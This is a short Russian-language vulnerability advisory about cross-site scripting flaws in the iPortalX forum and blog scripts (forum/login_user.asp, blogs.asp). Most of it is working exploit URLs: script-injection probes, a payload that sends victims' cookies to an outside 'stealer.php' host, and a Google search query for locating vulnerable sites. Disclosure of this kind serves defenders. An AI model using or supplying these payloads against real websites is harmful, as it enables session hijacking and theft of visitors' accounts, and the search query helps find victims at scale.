Программа: iPortalX

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных сценариями forum/login_user.asp и blogs.asp. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

Search XSS:

/forum/login_user.asp?Redirect=/forum/search.asp@KW=%22%3E%3 Cscript%3Ealert(document.cookie);%3C/script%3E
/forum/login_user.asp?Redirect=/members.asp?SF=%22%3E%3Cscri pt%3Ealert(document.cookie);%3C/script%3E

Получение Cookie:

Path/forum/login_user.asp?FID=0&Redirect=/login_user.asp ?Redirect=/members.asp?SF= %3Cscript%3Edocument.location=%22h ttp://www.mysite/stealer.php? cookie=%22%20+%20document.cooki e;%3C/script%3E

Blog XSS:

/Path/blogs.asp?CID=0&AID=0&Date=%22%3E%3Cscript%3Ea lert(document.cookie);%3C/script%3E

Google Search:

http://www.google.com/search?hl=en&q=%2Fforum%2Flogin_us er.asp%3FRedirect%3D%2F&btnG= Google+Search



Оставить мнение